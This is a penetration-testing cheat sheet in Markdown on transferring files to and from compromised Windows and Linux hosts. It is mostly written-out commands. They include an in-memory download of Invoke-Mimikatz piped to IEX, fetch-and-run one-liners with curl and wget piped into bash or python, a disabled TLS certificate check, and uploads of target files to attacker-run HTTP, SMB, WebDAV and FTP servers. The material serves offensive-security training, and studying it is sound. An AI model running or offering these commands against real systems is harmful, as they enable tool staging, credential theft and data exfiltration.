File Transfer.md
1 ## Windows File Transfer Methods 2 3 ### Download 4 5 #### PowerShell Base64 Encode & Decode 6 7 We can encode a file in base64, copy the file to the target's terminal and decode the string 8 9 ```bash 10 # Doing checksum before encoding 11 md5sum file.txt 12 aa...c 13 14 # Encoding with base64 15 cat file.txt |base64 -w 0; echo 16 ``` 17 18 ```powershell 19 # Decoding with base64 on Windows 20 [IO.File]::WriteAllBytes("C:\Users\Public\file.txt", [Convert]::FromBase64String("<base64 content>")) 21 22 # Checking checksum once decoded 23 Get-FileHash C:\Users\Public\file.txt -Algorithm md5 24 aa...c 25 ``` 26 27 #### PowerShell Web Downloads 28 29 Is pretty common because company allow outbound traffic through the firewall 30 31 Some web filtering might prevent this if the downloaded file is `.exe` 32 33 | **Method** | **Description** | 34 | ------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------------------------------------------------------------- | 35 | [OpenRead](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openread?view=net-6.0) | Returns the data from a resource as a [Stream](https://docs.microsoft.com/en-us/dotnet/api/system.io.stream?view=net-6.0). | 36 | [OpenReadAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openreadasync?view=net-6.0) | Returns the data from a resource without blocking the calling thread. | 37 | [DownloadData](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddata?view=net-6.0) | Downloads data from a resource and returns a Byte array. | 38 | [DownloadDataAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddataasync?view=net-6.0) | Downloads data from a resource and returns a Byte array without blocking the calling thread. | 39 | [DownloadFile](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-6.0) | Downloads data from a resource to a local file. | 40 | [DownloadFileAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfileasync?view=net-6.0) | Downloads data from a resource to a local file without blocking the calling thread. | 41 | [DownloadString](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-6.0) | Downloads a String from a resource and returns a String. | 42 | [DownloadStringAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstringasync?view=net-6.0) | Downloads a String from a resource without blocking the calling thread. | 43 44 ```powershell 45 # Downloading files using PowerShell on Windows 46 (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>') 47 # OR 48 (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>') 49 50 # Downloading String 51 # Can be piped into IEX to run in directly in memory 52 (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/refs/heads/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1') | IEX 53 54 55 # Downloading using Invoke-WebRequest 56 Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 57 58 # If any method above doesnt work because of Internet Explorer, use 59 Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 -UseBasicParsing 60 61 # Set this if there is any error because of [[SSL]]/[[TLS]] 62 [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} 63 ``` 64 65 You can look a longer list [here](https://gist.github.com/HarmJ0y/bb48307ffa663256e239) 66 67 #### SMB Downloads 68 69 We can use [[Impacket smbserver.py]] with copy, move, [[PowerShell]] Copy-Item 70 71 ```bash 72 # Creating SMB Server on Linux Device with share named share 73 sudo impacket-smbserver share -smb2support /tmp/smbshare 74 75 # Creating SMB Server on Linux Device with share named share 76 # User and Pass set to test 77 sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test 78 ``` 79 80 ```cmd 81 # Connecting to SMB Server 82 net use n: \\<ip>\share 83 84 # Connecting to SMB Server with username and password test 85 net use n: \\<ip>\share /user:test test 86 87 # Copying the desired files 88 copy n:\file.exe 89 ``` 90 91 #### FTP Downloads 92 93 ```bash 94 # Installing ftp server python3 module 95 sudo pip3 install pyftpdlib 96 97 # Setting up ftp server on linux 98 sudo python3 -m pyftpdlib --port 21 99 ``` 100 101 ```powershell 102 # Downloading file from a ftp server using PowerShell 103 (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt') 104 ``` 105 106 Below is an example of how to make a command files that would run all the command once connected to the [[FTP]] server 107 108 ```cmd 109 echo open <ip> > ftpcommand.txt 110 echo USER anonymous >> ftpcommand.txt 111 echo binary >> ftpcommand.txt 112 echo GET <desirefile> >> ftpcommand.txt 113 echo bye >> ftpcommand.txt 114 echo ftp -v -n -s:ftpcommand.txt 115 ``` 116 117 ### Upload 118 #### PowerShell Base64 Encode & Decode 119 120 ```powershell 121 # Checking checksum before encoding 122 Get-FileHash "C:\Path\To\File" -Algorithm MD5 | select Hash 123 124 # Encoding with [[MD5]] on PowerShell 125 [Convert]::ToBase64String((Get-Content -path "C:\Path\To\File" -Encoding byte)) 126 ``` 127 128 ```bash 129 # Decoding MD5 String 130 echo '<md5 string>' | base64 -d > <filename> 131 132 # Checking checksum after decoding 133 md5sum <filename> 134 ``` 135 136 #### PowerShell Web Uploads 137 138 ```bash 139 # Setting up upload server 140 pip3 install uploadserver 141 python3 -m uploadserver 142 143 # Setting up [[Netcat]] to receive Base64 data 144 nc -lvnp 8080 145 ``` 146 147 ```powershell 148 # Downloading the script needed to upload files 149 IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') 150 151 # Uploading file to server 152 Invoke-FileUpload -Uri http://<server-ip>/upload -File C:\Path\To\File 153 154 # Uploading Base64 to server 155 $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\To\File' -Encoding Byte)) 156 Invoke-WebRequest -Uri http://<server-ip>/ -Method POST -Body $b64 157 ``` 158 159 #### SMB Uploads 160 161 Commonly [[SMB]] protocol is not allowed outside the internal network 162 163 We can run [[SMB]] over [[HTTP]] with `WebDav.WebDav`, it will try to connect using [[SMB]] protocol, if there is no [[SMB]] share available, it will connect using [[HTTP]] 164 165 ```bash 166 # Setting up WebDav Server 167 sudo pip3 install wsgidav cheroot 168 sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous 169 ``` 170 171 ```powershell 172 # Connecting to WebDav Server 173 dir \\<webdav ip>\DavWWWRoot 174 175 # Uploading files using [[SMB]] 176 copy C:\Path\To\File \\<webdav ip>\DavWWWRoot\ 177 # OR 178 copy C:\Path\To\File \\<webdav ip>\<sharefolder>\ 179 ``` 180 181 ```ad-note 182 DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests that you are connecting to the root of the WebDAV server. 183 ``` 184 185 #### FTP 186 187 ```bash 188 # Setting up ftp server for upload 189 sudo python3 -m pyftpdlib --port 21 --write 190 ``` 191 192 ```powershell 193 # Uploading file to FTP server 194 (New-Object Net.WebClient).UploadFile('ftp://<ftp ip>/<filename>', 'C:\Path\To\File') 195 ``` 196 197 You could also make a command file for uploading file using [[FTP]] 198 199 ```cmd 200 echo open <ftp ip> ftpcommand.txt 201 echo USER anonymous >> ftpcommand.txt 202 echo binary >> ftpcommand.txt 203 echo PUT c:\path\to\file >> ftpcommand.txt 204 echo bye >> ftpcommand.txt 205 ftp -v -n -s:ftpcommand.txt 206 ``` 207 208 ## Linux File Transfer Operation 209 210 ### Download 211 212 #### Base64 Encoding / Decoding 213 214 ```bash 215 # Check file checksum 216 md5sum <file> 217 218 # Encode file using Base64 219 cat <file> | base64 -w 0;echo 220 221 # Decode Base64 string 222 echo -n '<base64 string>' | base64 -d > <file> 223 ``` 224 225 #### Web Downloads using [[wget]] and [[curl]] 226 227 ```bash 228 # Download file using wget 229 wget http://<ip>/<file> -O <output file name> 230 231 # Download using curl 232 curl -o <output file name> http://<ip>/<file> 233 234 # Fileless download with wget 235 # -q is for quiet mode, no output to stdout 236 # -O- is redirecting downloaded content to stdout 237 wget -qO- http://<ip>/<filename>.py | python3 238 239 # Fileless download with curl 240 curl http://<ip>/<file> | bash 241 ``` 242 243 #### Download with Bash (/dev/tcp) 244 ```bash 245 # Run all the lines below one after another 246 exec 3<>/dev/tcp/<ip>/<port> # Connects to the server, allow read write from the TCP socket 247 echo -e "GET /<file> HTTP/1.1\n\n">&3 # Send HTTP GET and redirect stdout to file descriptor 3(the socket) 248 cat <&3 # Reads response from the file descriptor 3(the socket) 249 ``` 250 251 #### SSH Downloads 252 253 ```bash 254 # Check which port SSH is listening on 255 netstat -lnpt 256 257 # Download a file and saves it at the current working directory 258 scp <user>@<ip>:/location/to/file . 259 ``` 260 261 ### Upload 262 263 #### Web Upload 264 265 ```bash 266 # Install upload web server 267 sudo python3 -m pip install --user uploadserver 268 269 # Create a self signed cert 270 openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' 271 272 # Starting web server with self signed cert 273 sudo python3 -m uploadserver 443 --server-certificate /path/to/file.pem 274 275 # Uploading multiple files 276 # The @ is telling curl to take the file's content 277 curl -X POST https://<ip>/upload -F 'files=@/path/to/file1' -F 'files=@/path/to/file2' --insecure 278 ``` 279 280 #### Alternative Web File Transfer Method 281 282 ```bash 283 # Starting a server in python 284 python3 -m http.server 285 286 # Starting a server in python 2 287 python2.7 -m SimpleHTTPServer 288 289 # starting a server in php 290 php -S 0.0.0.0:8000 291 292 # starting a server in ruby 293 ruby -run -ehttpd . -p8000 294 295 # Downloading the file from target 296 wget <target ip>:<port>/<filename> 297 298 # Using scp to upload files 299 scp /path/to/file <user>@<ip>:/path/to/save/file 300 ``` 301